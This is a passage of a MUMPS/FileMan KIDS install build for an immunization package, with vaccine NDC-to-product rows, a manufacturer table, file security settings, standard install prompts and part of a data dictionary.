58160-0805-10^225^142^Rotarix
"DATA",9002084.95,1163,0)
58160-0805-11^225^142^Rotarix
"DATA",9002084.95,1164,0)
00008-2562-02^135^160^RotaShield
"DATA",9002084.95,1165,0)
24992-0330-01^101^137^ACAM2000
"DATA",9002084.95,1166,0)
24992-0330-02^101^137^ACAM2000
"DATA",9002084.95,1167,0)
24992-0330-03^101^137^ACAM2000
"DATA",9002084.95,1168,0)
00008-0348-08^101^160^Dryvax
"DATA",9002084.95,1169,0)
49281-0770-40^202^137^Old Mono Vacc
"DATA",9002084.95,1170,0)
42023-0104-01^203^135^Aplisol
"DATA",9002084.95,1171,0)
42023-0104-05^203^135^Aplisol
"DATA",9002084.95,1172,0)
68788-0669-07^203^135^TBTest-PPD
"DATA",9002084.95,1173,0)
11793-7521-01^203^135^Tubersol
"DATA",9002084.95,1174,0)
11793-7522-01^203^135^Tubersol
"DATA",9002084.95,1175,0)
11793-7522-02^203^135^Tubersol
"DATA",9002084.95,1176,0)
11793-7526-01^203^135^Tubersol
"DATA",9002084.95,1177,0)
49281-0752-21^203^135^Tubersol
"DATA",9002084.95,1178,0)
49281-0752-22^203^135^Tubersol
"DATA",9002084.95,1179,0)
54868-2328-01^203^135^Tubersol
"DATA",9002084.95,1180,0)
54868-2696-00^203^135^Tubersol
"DATA",9002084.95,1181,0)
54868-2972-01^203^135^Tubersol
"DATA",9002084.95,1182,0)
54868-3356-01^203^135^Tubersol
"DATA",9002084.95,1183,0)
11793-7520-01^205^137^TBTest
"DATA",9002084.95,1184,0)
11793-2101-00^102^124^Td
"DATA",9002084.95,1186,0)
11793-2101-01^102^124^Td
"DATA",9002084.95,1188,0)
14362-0111-01^102^124^Td
"DATA",9002084.95,1190,0)
14362-0111-03^102^124^Td
"DATA",9002084.95,1192,0)
14362-0111-05^102^124^Td
"DATA",9002084.95,1196,0)
17478-0130-10^102^124^Td
"DATA",9002084.95,1198,0)
17478-0131-01^102^124^Td
"DATA",9002084.95,1202,0)
21695-0413-01^102^124^Td
"DATA",9002084.95,1204,0)
49281-0271-10^102^124^Td
"DATA",9002084.95,1206,0)
49281-0271-83^102^124^Td
"DATA",9002084.95,1208,0)
49281-0271-92^102^124^Td
"DATA",9002084.95,1212,0)
68788-0637-01^102^124^Td
"DATA",9002084.95,1214,0)
49281-0291-10^219^137^DECAVAC
"DATA",9002084.95,1215,0)
49281-0291-83^219^137^DECAVAC
"DATA",9002084.95,1218,0)
54868-5359-00^219^137^DECAVAC
"DATA",9002084.95,1219,0)
49281-0215-10^219^137^TENIVAC
"DATA",9002084.95,1220,0)
49281-0215-15^219^137^TENIVAC
"DATA",9002084.95,1223,0)
11793-4000-05^221^137^Adacel
"DATA",9002084.95,1224,0)
11793-4001-00^221^137^Adacel
"DATA",9002084.95,1225,0)
11793-4001-05^221^137^Adacel
"DATA",9002084.95,1226,0)
49281-0400-05^221^137^Adacel
"DATA",9002084.95,1227,0)
49281-0400-10^221^137^Adacel
"DATA",9002084.95,1228,0)
49281-0400-15^221^137^Adacel
"DATA",9002084.95,1231,0)
66521-0200-02^221^137^Adacel
"DATA",9002084.95,1232,0)
58160-0842-01^221^142^Boostrix
"DATA",9002084.95,1233,0)
58160-0842-11^221^142^Boostrix
"DATA",9002084.95,1234,0)
58160-0842-41^221^142^Boostrix
"DATA",9002084.95,1235,0)
58160-0842-46^221^142^Boostrix
"DATA",9002084.95,1236,0)
58160-0842-51^221^142^Boostrix
"DATA",9002084.95,1240,0)
14362-0103-05^104^137^TT
"DATA",9002084.95,1241,0)
46331-0110-19^104^137^TT
"DATA",9002084.95,1242,0)
46331-0110-23^104^137^TT
"DATA",9002084.95,1243,0)
49281-0800-83^104^137^TT
"DATA",9002084.95,1244,0)
49281-0820-10^104^137^TT
"DATA",9002084.95,1245,0)
54868-3597-00^104^137^TT
"DATA",9002084.95,1246,0)
14645-0790-01^207^137^Typhim Vi
"DATA",9002084.95,1247,0)
14645-0790-20^207^137^Typhim Vi
"DATA",9002084.95,1248,0)
14645-0790-50^207^137^Typhim Vi
"DATA",9002084.95,1249,0)
14645-0790-51^207^137^Typhim Vi
"DATA",9002084.95,1250,0)
49281-0790-01^207^137^Typhim Vi
"DATA",9002084.95,1251,0)
49281-0790-20^207^137^Typhim Vi
"DATA",9002084.95,1252,0)
49281-0790-51^207^137^Typhim Vi
"DATA",9002084.95,1254,0)
17090-0003-01^154^109^Vivotif/Ty21a
"DATA",9002084.95,1256,0)
54868-3954-00^154^109^Vivotif/Ty21a
"DATA",9002084.95,1258,0)
58337-0003-01^154^109^Vivotif/Ty21a
"DATA",9002084.95,1262,0)
49281-0915-01^120^137^YF-VAX
"DATA",9002084.95,1263,0)
49281-0915-05^120^137^YF-VAX
"DATA",9002084.95,1264,0)
49281-0915-20^120^137^YF-VAX
"DATA",9002084.95,1265,0)
00006-4107-00^227^128^Zostavax
"DATA",9002084.95,1266,0)
00006-4107-01^227^128^Zostavax
"DATA",9002084.95,1267,0)
00006-4107-41^227^128^Zostavax
"DATA",9002084.95,1268,0)
54868-5703-00^227^128^Zostavax
"DATA",9002084.95,1270,0)
11111-1111-11^150^131^RabAvert
"DATA",9002084.95,1271,0)
58160-0815-32^209^142^Twinrix
"DATA",9002084.95,1273,0)
58160-0826-52^168^142^Havrix-Adult
"DATA",9002084.95,1274,0)
66019-0110-10^217^125^FluMist
"DATA",9002084.95,1276,0)
00006-4133-41^102^124^Td
"DATA",9002084.95,1277,0)
49281-0390-15^243^137^Fluzone
"DATA",9002084.95,1278,0)
49281-0012-10^242^137^Fluzone Pres-Free
"DATA",9002084.95,1279,0)
49281-0012-50^242^137^Fluzone Pres-Free
"DATA",9002084.95,1280,0)
49281-0391-65^236^137^Fluzone High-Dose
"DATA",9002084.95,1281,0)
49281-0705-55^243^137^Fluzone
"DATA",9002084.95,1282,0)
58160-0830-52^224^142^Cervarix
"DATA",9002084.95,1283,0)
62452-9994-01^243^142^FluLaval
"DATA",9002084.95,1284,0)
66521-0115-10^243^131^Fluvirin
"DATA",9002084.95,1285,0)
66521-0115-02^242^131^Fluvirin Pres-Free
"DATA",9002084.95,1286,0)
49281-0012-25^242^137^Fluzone Pres-Free
"DATA",9002084.95,1287,0)
58160-0879-52 ^242^142^FLUARIX^^0
"DATA",9002084.95,1288,0)
49281-0112-25^242^137^Fluzone Pres-Free^^0
"DATA",9002084.95,1289,0)
33332-0012-01^242^155^Afluria, p-free^^0
"DATA",9002084.95,1290,0)
33332-0112-10^243^155^Afluria^^0
"DATA",9002084.95,1291,0)
19515-0889-07^243^142^Flulaval^^0
"DATA",9002084.95,1292,0)
49281-0013-88^242^137^^^0
"DATA",9002084.95,1294,0)
19515-0890-07^243^142^FLULAVAL
"DATA",9002084.95,1295,0)
33332-0113-10^243^155^AFLURIA
"DATA",9002084.95,1296,0)
33332-0013-01^242^155^"Afluria, preservative free"
"DATA",9002084.95,1297,0)
46028-0110-01^242^131^AGRIFLU
"DATA",9002084.95,1298,0)
49281-0707-55^243^137^FLUZONE
"DATA",9002084.95,1299,0)
49281-0392-15^243^137^FLUZONE
"DATA",9002084.95,1300,0)
49281-0113-25^242^137^FLUVIRIN-PRESERVATIVE FREE
"DATA",9002084.95,1301,0)
49281-0013-10^242^137^FLUZONE-PRESERVATIVE FREE
"DATA",9002084.95,1302,0)
49281-0013-50^242^137^FLUZONE-PRESERVATIVE FREE
"DATA",9002084.95,1303,0)
49281-0111-025^242^137^FLUZONE-PRESERVATIVE FREE
"DATA",9002084.95,1304,0)
49821-0860-10^107^137^IPOL
"DATA",9002084.95,1305,0)
58160-0900-52^254^142^"Fluarix, quadrivalent"
"DATA",9002084.95,1306,0)
58160-0880-52^242^142^FLUARIX
"DATA",9002084.95,1307,0)
58160-0810-51^133^142^INFANRIX
"DATA",9002084.95,1308,0)
63851-0612-01^257^131^Flucelvax
"DATA",9002084.95,1309,0)
66019-0300-10^253^125^Flumist quadrivalent
"DATA",9002084.95,1310,0)
66521-0116-02^242^131^FLUVIRIN-PRESERVATIVE FREE
"DATA",9002084.95,1311,0)
66521-0116-10^242^131^FLUVIRIN-PRESERVATIVE FREE
"DATA",9002084.97,100,0)
ABBOTT LABORATORIES^AB^1^Abbott Laboratories (includes Ross Products Division)
"DATA",9002084.97,101,0)
ADAMS LABORATORIES^AD^1^Adams Laboratories, Inc.
"DATA",9002084.97,102,0)
ALPHA THERAPEUTIC^ALP^1^Alpha Therapeutic Corporation
"DATA",9002084.97,103,0)
ARMOUR^AR^0^Armour [Inactive-use CEN]
"DATA",9002084.97,104,0)
AVENTIS BEHRING L.L.C.^AVB^0^Aventis Behring L.L.C. (formerly Centeon L.L.C.; includes Armour Pharmaceutical Company)
"DATA",9002084.97,105,0)
AVIRON^AVI^0^Aviron
"DATA",9002084.97,106,0)
BAXTER HEALTHCARE^BA^0^Baxter Healthcare Coporation [Inactive-use BAH]
"DATA",9002084.97,107,0)
BAXTER HEALTH^BAH^1^Baxter Health Corporation (includes Hyland Immuno, Immuno International AG, and North American Vaccine, Inc.)
"DATA",9002084.97,108,0)
BAYER^BAY^0^Bayer Corporation (includes Miles, Inc. and Cutter Laboratories)
"DATA",9002084.97,109,0)
BERNA PRODUCTS^BP^0^Berna Products [Inactive-use BPC]
"DATA",9002084.97,110,0)
BERNA PRODUCTS^BPC^1^Berna Products Corporation (includes Swiss Serum and Vaccine Institute Berne)^Berna Products Corporation
"DATA",9002084.97,111,0)
CENTEON L.L.C.^CEN^0^Centeon L.L.C. [Inactive--use AVB]
"DATA",9002084.97,112,0)
CHIRON^CHI^0^Chiron Corporation
"DATA",9002084.97,113,0)
CELLTECH MEDEVA PHARMACEUTICALS ^CMP^0^Celltech Medeva Pharmaceuticals [Inactive--use PWJ]
"DATA",9002084.97,114,0)
CONNAUGHT^CON^0^Connaught [Inactive-use PMC]
"DATA",9002084.97,115,0)
EVANS MEDICAL LIMITED^EVN^0^Evans Medical Limited [Inactive--use PWJ]
"DATA",9002084.97,116,0)
GREER LABORATORIES^GRE^1^Greer Laboratories, Inc.
"DATA",9002084.97,117,0)
IMMUNO INTERNATIONAL AG^IAG^0^Immuno International AG [Inactive-use BAH]
"DATA",9002084.97,118,0)
MERIEUX^IM^0^Merieux [Inactive-use PMC]
"DATA",9002084.97,119,0)
IMMUNO-U.S.^IUS^1^Immuno-U.S., Inc.
"DATA",9002084.97,120,0)
THE RESEARCH FOUNDATION FOR MICR^JPN^1^The Research Foundation for Microbial Diseases of Osaka University(BIKEN)
"DATA",9002084.97,121,0)
KOREA GREEN CROSS^KGC^1^Korea Green Cross Corporation
"DATA",9002084.97,122,0)
LEDERLE^LED^0^Lederle [Inactive-use WAL]
"DATA",9002084.97,123,0)
MASSACHUSETTS PUBLIC HEALTH BIOL^MA^0^Massachusetts Public Health Biologic Laboratories[Inactive-use MBL]^Massachusetts Public Health
"DATA",9002084.97,124,0)
MASSACHUSETTS BIOLOGIC LABORATOR^MBL^1^Massachusetts Biologic Laboratories (formerly Massachusetts Public Health Biologic Laboratories)^Massachusetts Biologic Laboratories
"DATA",9002084.97,125,0)
MEDIMMUNE^MED^1^MedImmune, Inc.^MedImmune
"DATA",9002084.97,126,0)
MILES^MIL^0^Miles [Inactive-use BAY]
"DATA",9002084.97,127,0)
EMERGENT BIODEFENSE OPERATIONS^MIP^1^Bioport Corporation (formerly Michigan Biologic Products Institute)^BioPort Corporation
"DATA",9002084.97,128,0)
MERCK & CO.^MSD^1^Merck & Co., Inc.^Merck
"DATA",9002084.97,129,0)
NABI^NAB^1^NABI (formerly North American Biologicals, Inc.)
"DATA",9002084.97,130,0)
NORTH AMERICAN VACCINE^NAV^0^North American Vaccine, Inc. [Inactive-use BAH]^North American Biologicals, Inc.
"DATA",9002084.97,131,0)
NOVARTIS PHARMACEUTICAL^NOV^1^Novartis Pharmaceutical Corporation (includes Ciba-Geigy Limited and Sandoz Limited)^Novartis Pharmaceutical Corporation
"DATA",9002084.97,132,0)
NEW YORK BLOOD CENTER^NYB^1^New York Blood Center
"DATA",9002084.97,133,0)
ORTHO-CLINICAL DIAGNOSTICS^ORT^1^Ortho-Clinical Diagnostics (formerly Ortho Diagnostics Systems, Inc.)
"DATA",9002084.97,134,0)
ORGANON TEKNIKA^OTC^1^Organon Teknika Corporation^Organon Teknika
"DATA",9002084.97,135,0)
OTHER MANUFACTURER^OTH^1^Other manufacturer
"DATA",9002084.97,136,0)
PARKEDALE PHARMACEUTICALS^PD^0^Parkedale Pharmaceuticals (formerly Parke-Davis)^Parkedale Pharmaceuticals
"DATA",9002084.97,137,0)
SANOFI PASTEUR^PMC^1^sanofi pasteur (formerly Aventis Pasteur, Pasteur Merieux Connaught; includes Connaught Laboratories and Pasteur Merieux)^Sanofi Pasteur
"DATA",9002084.97,138,0)
PRAXIS BIOLOGICS^PRX^0^Praxis Biologics [Inactive-use WAL]
"DATA",9002084.97,139,0)
POWERJECT PHARAMACEUTICALS^PWJ^0^PowerJect Pharamaceuticals (includes Celltech Medeva Vaccines and Evans Medical Limited)
"DATA",9002084.97,140,0)
SCLAVO^SCL^1^Sclavo, Inc.
"DATA",9002084.97,141,0)
SWISS SERUM AND VACCINE INST.^SI^0^Swiss Serum and Vaccine Inst. [Inactive-use BPC]
"DATA",9002084.97,142,0)
GLAXOSMITHKLINE^SKB^1^GlaxoSmithKline (formerly SmithKline Beecham; includes SmithKline Beecham and Glaxo Wellcome)^GlaxoSmithKline
"DATA",9002084.97,143,0)
UNKNOWN MANUFACTURER^UNK^1^Unknown manufacturer
"DATA",9002084.97,144,0)
UNITED STATES ARMY MEDICAL RESEA^USA^1^United States Army Medical Research and Material Command
"DATA",9002084.97,145,0)
WYETH-AYERST^WA^0^Wyeth-Ayerst [Inactive-use WAL]
"DATA",9002084.97,146,0)
WYETH^WAL^1
"DATA",9002084.97,147,0)
CANGENE CORPORATION^CNJ^1^Cangene Corporation
"DATA",9002084.97,148,0)
DYNPORT VACCINE COMPANY^DVC^1^DynPort Vaccine Company, LLC
"DATA",9002084.97,149,0)
GEOVAX LABS^GEO^1^GeoVax Labs, Inc.
"DATA",9002084.97,150,0)
NOVAVAX^NVX^1^Novavax, Inc.
"DATA",9002084.97,151,0)
SOLVAY PHARMACEUTICALS^SOL^0^Solvay Pharmaceuticals
"DATA",9002084.97,152,0)
TALECRIS BIOTHERAPEUTICS^TAL^1^Talecris Biotherapeutics (includes Bayer Biologicals) ^Talecris Biotherapeutics
"DATA",9002084.97,153,0)
VAXGEN^VXG^0^Vaxgen
"DATA",9002084.97,154,0)
BEHRING^ZLB^0^Behring (includes Aventis Behring and Armour Pharmaceutical Company)
"DATA",9002084.97,155,0)
CSL Behring, Inc.^CSL^1^CSL Behring, Inc.
"DATA",9002084.97,156,0)
ACAMBIS^ACA^0^Acambis, Inc
"DATA",9002084.97,157,0)
AKORN, INC^AKR^1^Akorn, Inc.
"DATA",9002084.97,158,0)
BIOTEST PHARMACEUTICALS CORP^BTP^1^Biotest Pharmaceuticals Corp
"DATA",9002084.97,159,0)
INTERCELL BIOMEDICAL^INT^1^Intercell Biomedical
"DATA",9002084.97,160,0)
PFIZER, INC^PFR^1^Pfizer, Inc.
"DATA",9002084.97,161,0)
Barr Laboratories^BRR^1^Barr Laboratories
"DATA",9002084.97,162,0)
Johnson and Johnson^JNJ^1^Johnson and Johnson
"DATA",9002084.97,163,0)
Protein Sciences^PSC^1^Protein Sciences
"DATA",9002084.97,164,0)
Grifols^GRF^1^Grifols
"DATA",9002084.97,165,0)
ID Biomedical^IDB^1^ID Biomedical
"DATA",9002084.97,166,0)
JHP PHARMACEUTICALS^JHP^1^JHP Pharmaceuticals
"DATA",9002084.97,167,0)
CRUCELL^CRU^1^Crucell
"DATA",9002084.97,168,0)
KEDRIAN BIOPHARMA^KED^1^Kedrian Biopharma
"FIA",9002084.118)
BI V IMMUNIZATIONS DELETED
"FIA",9002084.118,0)
^BIVIMMD(
"FIA",9002084.118,0,0)
9002084.118PA
"FIA",9002084.118,0,1)
y^y^f^^^^n
"FIA",9002084.118,0,10)
"FIA",9002084.118,0,11)
"FIA",9002084.118,0,"RLRO")
"FIA",9002084.118,9002084.118)
0
"FIA",9002084.118,9002084.1191)
0
"FIA",9002084.118,9002084.1206)
0
"FIA",9002084.118,9002084.1207)
0
"FIA",9002084.61)
BI USER SELECTIONS
"FIA",9002084.61,0)
^BISELECT(
"FIA",9002084.61,0,0)
9002084.61
"FIA",9002084.61,0,1)
y^y^f^^n^^n^o^n
"FIA",9002084.61,0,10)
"FIA",9002084.61,0,11)
"FIA",9002084.61,0,"RLRO")
"FIA",9002084.61,9002084.61)
0
"FIA",9002084.61,9002084.611)
0
"FIA",9002084.62)
BI USER DATE-LOC LINE
"FIA",9002084.62,0)
^BIDLOC(
"FIA",9002084.62,0,0)
9002084.62
"FIA",9002084.62,0,1)
y^y^f^^n^^n^o^n
"FIA",9002084.62,0,10)
"FIA",9002084.62,0,11)
"FIA",9002084.62,0,"RLRO")
"FIA",9002084.62,9002084.62)
0
"FIA",9002084.63)
BI USER AGE RANGE
"FIA",9002084.63,0)
^BIAGRG(
"FIA",9002084.63,0,0)
9002084.63
"FIA",9002084.63,0,1)
y^y^f^^n^^n^o^n
"FIA",9002084.63,0,10)
"FIA",9002084.63,0,11)
"FIA",9002084.63,0,"RLRO")
"FIA",9002084.63,9002084.63)
0
"FIA",9002084.7)
BI PACKAGE INFORMATION
"FIA",9002084.7,0)
^BINFO(
"FIA",9002084.7,0,0)
9002084.7
"FIA",9002084.7,0,1)
y^y^f^^n^^y^o^n
"FIA",9002084.7,0,10)
"FIA",9002084.7,0,11)
"FIA",9002084.7,0,"RLRO")
"FIA",9002084.7,9002084.7)
0
"FIA",9002084.7,9002084.701)
0
"FIA",9002084.8)
BI TABLE REACTION
"FIA",9002084.8,0)
^BIREC(
"FIA",9002084.8,0,0)
9002084.8I
"FIA",9002084.8,0,1)
y^y^f^^n^^y^o^n
"FIA",9002084.8,0,10)
"FIA",9002084.8,0,11)
"FIA",9002084.8,0,"RLRO")
"FIA",9002084.8,9002084.8)
0
"FIA",9002084.82)
BI TABLE ADD INFO ITEMS
"FIA",9002084.82,0)
^BIADDIN(
"FIA",9002084.82,0,0)
9002084.82
"FIA",9002084.82,0,1)
y^y^f^^n^^y^o^n
"FIA",9002084.82,0,10)
"FIA",9002084.82,0,11)
"FIA",9002084.82,0,"RLRO")
"FIA",9002084.82,9002084.82)
0
"FIA",9002084.83)
BI TABLE ELIGIBILITY CODES
"FIA",9002084.83,0)
^BIELIG(
"FIA",9002084.83,0,0)
9002084.83I
"FIA",9002084.83,0,1)
y^y^f^^n^^y^o^n
"FIA",9002084.83,0,10)
"FIA",9002084.83,0,11)
"FIA",9002084.83,0,"RLRO")
"FIA",9002084.83,9002084.83)
0
"FIA",9002084.94)
BI IMMUNIZATION TABLE HL7/CVX STANDARD
"FIA",9002084.94,0)
^BITN(
"FIA",9002084.94,0,0)
9002084.94I
"FIA",9002084.94,0,1)
y^y^f^^n^^y^o^n
"FIA",9002084.94,0,10)
"FIA",9002084.94,0,11)
"FIA",9002084.94,0,"RLRO")
"FIA",9002084.94,9002084.94)
0
"FIA",9002084.95)
BI TABLE NDC CODES
"FIA",9002084.95,0)
^BINDC(
"FIA",9002084.95,0,0)
9002084.95
"FIA",9002084.95,0,1)
y^y^f^^n^^y^o^n
"FIA",9002084.95,0,10)
"FIA",9002084.95,0,11)
"FIA",9002084.95,0,"RLRO")
"FIA",9002084.95,9002084.95)
0
"FIA",9002084.97)
BI TABLE MANUFACTURERS
"FIA",9002084.97,0)
^BIMAN(
"FIA",9002084.97,0,0)
9002084.97I
"FIA",9002084.97,0,1)
y^y^f^^n^^y^o^n
"FIA",9002084.97,0,10)
"FIA",9002084.97,0,11)
"FIA",9002084.97,0,"RLRO")
"FIA",9002084.97,9002084.97)
0
"IX",9002084.118,9002084.118,"AMAP",0)
9002084.118^AMAP^SNOMED MAPPING^MU^^R^IR^I^9002084.118^^^^^A
"IX",9002084.118,9002084.118,"AMAP",1)
I $T(IMM^AUPNMAP)]"" D IMM^AUPNMAP
"IX",9002084.118,9002084.118,"AMAP",2)
Q
"IX",9002084.118,9002084.118,"AMAP",11.1,0)
^.114IA^2^2
"IX",9002084.118,9002084.118,"AMAP",11.1,1,0)
1^F^9002084.118^.01^^1^F
"IX",9002084.118,9002084.118,"AMAP",11.1,2,0)
2^F^9002084.118^.03^^2^F
"MBREQ")
0
"QUES","XPF1",0)
Y
"QUES","XPF1","??")
^D REP^XPDH
"QUES","XPF1","A")
Shall I write over your |FLAG| File
"QUES","XPF1","B")
YES
"QUES","XPF1","M")
D XPF1^XPDIQ
"QUES","XPF2",0)
Y
"QUES","XPF2","??")
^D DTA^XPDH
"QUES","XPF2","A")
Want my data |FLAG| yours
"QUES","XPF2","B")
YES
"QUES","XPF2","M")
D XPF2^XPDIQ
"QUES","XPI1",0)
YO
"QUES","XPI1","??")
^D INHIBIT^XPDH
"QUES","XPI1","A")
Want KIDS to INHIBIT LOGONs during the install
"QUES","XPI1","B")
NO
"QUES","XPI1","M")
D XPI1^XPDIQ
"QUES","XPM1",0)
PO^VA(200,:EM
"QUES","XPM1","??")
^D MG^XPDH
"QUES","XPM1","A")
Enter the Coordinator for Mail Group '|FLAG|'
"QUES","XPM1","B")
"QUES","XPM1","M")
D XPM1^XPDIQ
"QUES","XPO1",0)
Y
"QUES","XPO1","??")
^D MENU^XPDH
"QUES","XPO1","A")
Want KIDS to Rebuild Menu Trees Upon Completion of Install
"QUES","XPO1","B")
NO
"QUES","XPO1","M")
D XPO1^XPDIQ
"QUES","XPZ1",0)
Y
"QUES","XPZ1","??")
^D OPT^XPDH
"QUES","XPZ1","A")
Want to DISABLE Scheduled Options, Menu Options, and Protocols
"QUES","XPZ1","B")
NO
"QUES","XPZ1","M")
D XPZ1^XPDIQ
"QUES","XPZ2",0)
Y
"QUES","XPZ2","??")
^D RTN^XPDH
"QUES","XPZ2","A")
Want to MOVE routines to other CPUs
"QUES","XPZ2","B")
NO
"QUES","XPZ2","M")
D XPZ2^XPDIQ
"SEC","^DD",9002084.95,9002084.95,.05,9)
"SEC","^DIC",9002084.118,9002084.118,0,"AUDIT")
@
"SEC","^DIC",9002084.118,9002084.118,0,"DD")
@
"SEC","^DIC",9002084.118,9002084.118,0,"DEL")
@
"SEC","^DIC",9002084.118,9002084.118,0,"LAYGO")
@
"SEC","^DIC",9002084.118,9002084.118,0,"RD")
@
"SEC","^DIC",9002084.118,9002084.118,0,"WR")
@
"SEC","^DIC",9002084.61,9002084.61,0,"AUDIT")
M
"SEC","^DIC",9002084.61,9002084.61,0,"DD")
@
"SEC","^DIC",9002084.61,9002084.61,0,"DEL")
M
"SEC","^DIC",9002084.61,9002084.61,0,"LAYGO")
M
"SEC","^DIC",9002084.61,9002084.61,0,"RD")
M
"SEC","^DIC",9002084.61,9002084.61,0,"WR")
M
"SEC","^DIC",9002084.62,9002084.62,0,"AUDIT")
M
"SEC","^DIC",9002084.62,9002084.62,0,"DD")
@
"SEC","^DIC",9002084.62,9002084.62,0,"DEL")
M
"SEC","^DIC",9002084.62,9002084.62,0,"LAYGO")
M
"SEC","^DIC",9002084.62,9002084.62,0,"RD")
M
"SEC","^DIC",9002084.62,9002084.62,0,"WR")
M
"SEC","^DIC",9002084.63,9002084.63,0,"AUDIT")
M
"SEC","^DIC",9002084.63,9002084.63,0,"DD")
@
"SEC","^DIC",9002084.63,9002084.63,0,"DEL")
M
"SEC","^DIC",9002084.63,9002084.63,0,"LAYGO")
M
"SEC","^DIC",9002084.63,9002084.63,0,"RD")
M
"SEC","^DIC",9002084.63,9002084.63,0,"WR")
M
"SEC","^DIC",9002084.7,9002084.7,0,"AUDIT")
M
"SEC","^DIC",9002084.7,9002084.7,0,"DD")
@
"SEC","^DIC",9002084.7,9002084.7,0,"DEL")
M
"SEC","^DIC",9002084.7,9002084.7,0,"LAYGO")
M
"SEC","^DIC",9002084.7,9002084.7,0,"RD")
M
"SEC","^DIC",9002084.7,9002084.7,0,"WR")
M
"SEC","^DIC",9002084.8,9002084.8,0,"AUDIT")
M
"SEC","^DIC",9002084.8,9002084.8,0,"DD")
@
"SEC","^DIC",9002084.8,9002084.8,0,"DEL")
M
"SEC","^DIC",9002084.8,9002084.8,0,"LAYGO")
M
"SEC","^DIC",9002084.8,9002084.8,0,"RD")
M
"SEC","^DIC",9002084.8,9002084.8,0,"WR")
M
"SEC","^DIC",9002084.82,9002084.82,0,"AUDIT")
@
"SEC","^DIC",9002084.82,9002084.82,0,"DD")
@
"SEC","^DIC",9002084.82,9002084.82,0,"DEL")
@
"SEC","^DIC",9002084.82,9002084.82,0,"LAYGO")
@
"SEC","^DIC",9002084.82,9002084.82,0,"RD")
@
"SEC","^DIC",9002084.82,9002084.82,0,"WR")
@
"SEC","^DIC",9002084.83,9002084.83,0,"AUDIT")
M
"SEC","^DIC",9002084.83,9002084.83,0,"DD")
@
"SEC","^DIC",9002084.83,9002084.83,0,"DEL")
M
"SEC","^DIC",9002084.83,9002084.83,0,"LAYGO")
M
"SEC","^DIC",9002084.83,9002084.83,0,"RD")
M
"SEC","^DIC",9002084.83,9002084.83,0,"WR")
M
"SEC","^DIC",9002084.94,9002084.94,0,"AUDIT")
M
"SEC","^DIC",9002084.94,9002084.94,0,"DD")
@
"SEC","^DIC",9002084.94,9002084.94,0,"DEL")
M
"SEC","^DIC",9002084.94,9002084.94,0,"LAYGO")
M
"SEC","^DIC",9002084.94,9002084.94,0,"RD")
M
"SEC","^DIC",9002084.94,9002084.94,0,"WR")
M
"SEC","^DIC",9002084.95,9002084.95,0,"AUDIT")
@
"SEC","^DIC",9002084.95,9002084.95,0,"DD")
@
"SEC","^DIC",9002084.95,9002084.95,0,"DEL")
@
"SEC","^DIC",9002084.95,9002084.95,0,"LAYGO")
@
"SEC","^DIC",9002084.95,9002084.95,0,"RD")
@
"SEC","^DIC",9002084.95,9002084.95,0,"WR")
@
"SEC","^DIC",9002084.97,9002084.97,0,"AUDIT")
M
"SEC","^DIC",9002084.97,9002084.97,0,"DD")
@
"SEC","^DIC",9002084.97,9002084.97,0,"DEL")
M
"SEC","^DIC",9002084.97,9002084.97,0,"LAYGO")
M
"SEC","^DIC",9002084.97,9002084.97,0,"RD")
M
"SEC","^DIC",9002084.97,9002084.97,0,"WR")
M
"VER")
8.0^22.0
"^DD",9002084.118,9002084.118,0)
FIELD^^2.04^43
"^DD",9002084.118,9002084.118,0,"DT")
3130529
"^DD",9002084.118,9002084.118,0,"IX","AA",9002084.118,.03)
"^DD",9002084.118,9002084.118,0,"IX","AATOO",9002084.118,.01)
"^DD",9002084.118,9002084.118,0,"IX","AATOO2",9002084.118,.02)
"^DD",9002084.118,9002084.118,0,"IX","AC",9002084.118,.02)
"^DD",9002084.118,9002084.118,0,"IX","AD",9002084.118,.03)
"^DD",9002084.118,9002084.118,0,"IX","ADT",9002084.118,.03)
"^DD",9002084.118,9002084.118,0,"IX","AQ",9002084.118,.04)
"^DD",9002084.118,9002084.118,0,"IX","AQTOO",9002084.118,.01)
"^DD",9002084.118,9002084.118,0,"IX","AV10",9002084.118,.03)
"^DD",9002084.118,9002084.118,0,"IX","AV9",9002084.118,.01)
"^DD",9002084.118,9002084.118,0,"IX","B",9002084.118,.01)
"^DD",9002084.118,9002084.118,0,"NM","BI V IMMUNIZATIONS DELETED")
"^DD",9002084.118,9002084.118,0,"PT",9002084.118,1208)
"^DD",9002084.118,9002084.118,0,"VRPK")
BI
"^DD",9002084.118,9002084.118,.01,0)
IMMUNIZATION^RP9999999.14'^AUTTIMM(^0;1^Q
"^DD",9002084.118,9002084.118,.01,1,0)
^.1^^-1
"^DD",9002084.118,9002084.118,.01,1,1,0)
9002084.118^B
"^DD",9002084.118,9002084.118,.01,1,1,1)
S ^BIVIMMD("B",$E(X,1,30),DA)=""
"^DD",9002084.118,9002084.118,.01,1,1,2)
K ^BIVIMMD("B",$E(X,1,30),DA)
"^DD",9002084.118,9002084.118,.01,1,2,0)
9002084.118^AV9^MUMPS
"^DD",9002084.118,9002084.118,.01,1,2,1)
S:$D(APCDLOOK) DIC("DR")=""
"^DD",9002084.118,9002084.118,.01,1,2,2)
Q
"^DD",9002084.118,9002084.118,.01,1,3,0)
9002084.118^AATOO^MUMPS
"^DD",9002084.118,9002084.118,.01,1,3,1)
I $P(^BIVIMMD(DA,0),U,2)]"",$P(^(0),U,3)]"" S ^BIVIMMD("AA",$P(^BIVIMMD(DA,0),U,2),X,(9999999-$P(+^AUPNVSIT($P(^BIVIMMD(DA,0),U,3),0),".",1)),DA)=""
"^DD",9002084.118,9002084.118,.01,1,3,2)
I $P(^BIVIMMD(DA,0),U,2)]"",$P(^(0),U,3)]"" K ^BIVIMMD("AA",$P(^BIVIMMD(DA,0),U,2),X,(9999999-$P(+^AUPNVSIT($P(^BIVIMMD(DA,0),U,3),0),".",1)),DA)
"^DD",9002084.118,9002084.118,.01,1,3,"%D",0)
^^5^5^2980320^^^
"^DD",9002084.118,9002084.118,.01,1,3,"%D",1,0)
This cross-reference is used for searches in sequence by patient,
"^DD",9002084.118,9002084.118,.01,1,3,"%D",2,0)
immunization internal entry, inverted visit date, and internal
"^DD",9002084.118,9002084.118,.01,1,3,"%D",3,0)
entry number.
"^DD",9002084.118,9002084.118,.01,1,3,"%D",4,0)
"^DD",9002084.118,9002084.118,.01,1,3,"%D",5,0)
"AA",PATIENT,IMMUNIZATION,VISIT,DA
"^DD",9002084.118,9002084.118,.01,1,4,0)
9002084.118^AQTOO^MUMPS
"^DD",9002084.118,9002084.118,.01,1,4,1)
